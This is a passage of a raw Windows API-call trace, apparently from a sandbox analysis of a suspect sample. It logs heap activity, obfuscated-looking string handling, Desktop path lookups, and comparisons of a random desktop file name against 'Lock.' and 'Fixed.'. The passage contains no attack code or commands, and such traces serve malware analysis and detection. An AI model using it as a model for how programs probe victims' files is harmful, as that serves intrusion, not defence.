wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0165.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0165.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0165.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0165.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0165.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0165.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0165.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0165.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0165.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0165.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0165.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0165.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0165.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0165.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gJ2GDQDH7i.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0165.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J2GDQDH7i.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0165.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2GDQDH7i.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0165.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GDQDH7i.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0165.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DQDH7i.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0165.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QDH7i.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0165.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DH7i.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0165.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H7i.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0165.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7i.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0165.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0165.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0165.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0165.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0165.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0165.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0165.496] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0165.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0165.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0165.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0165.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0165.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0165.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gJ2GDQDH7i.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0165.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J2GDQDH7i.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0165.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2GDQDH7i.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0165.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GDQDH7i.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0165.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DQDH7i.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0165.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QDH7i.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0165.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DH7i.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0165.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H7i.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0165.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7i.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0165.497] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0165.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0165.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0165.497] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0165.497] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0165.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0165.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0165.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0165.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0165.498] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0165.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0165.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0165.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0165.498] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0165.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0165.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0165.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0165.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0165.498] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0165.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0165.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0165.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0165.498] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0165.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0165.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0165.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0165.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0165.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0165.499] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0165.499] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.499] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0165.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0165.499] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0165.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0165.499] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0165.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0165.499] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0165.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0165.499] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/gJ2GDQDH7i.ots", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59f07050, ftCreationTime.dwHighDateTime=0x1d4c62b, ftLastAccessTime.dwLowDateTime=0x8bd0fab0, ftLastAccessTime.dwHighDateTime=0x1d4cdf4, ftLastWriteTime.dwLowDateTime=0x8bd0fab0, ftLastWriteTime.dwHighDateTime=0x1d4cdf4, nFileSizeHigh=0x0, nFileSizeLow=0x802, dwReserved0=0xb270006, dwReserved1=0xe378, cFileName="gJ2GDQDH7i.ots", cAlternateFileName="GJ2GDQ~1.OTS")) returned 0xaa56a0 [0165.499] FindClose (in: hFindFile=0xaa56a0 | out: hFindFile=0xaa56a0) returned 1 [0165.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0165.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0165.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0165.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0165.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.500] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0165.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0165.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0165.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0165.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0165.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0165.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0165.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0165.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0165.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0165.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0165.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0165.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0165.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0165.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0165.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0165.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0165.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0165.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0165.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.550] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0165.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0165.550] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0165.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0165.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0165.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0165.550] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0165.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0165.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0165.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0165.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0165.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0165.551] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0165.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0165.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0165.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0165.551] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0165.551] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0165.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0165.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0165.551] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0165.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0165.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8dc0 [0165.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0165.552] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0165.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0165.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0165.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0165.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0165.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0165.552] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0165.552] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0165.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0165.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0165.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0165.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0165.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0165.553] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0165.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0165.553] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0165.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0165.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0165.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0165.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0165.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0165.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0165.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.553] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.553] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0165.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0165.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0165.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0165.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0165.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0165.554] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0165.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 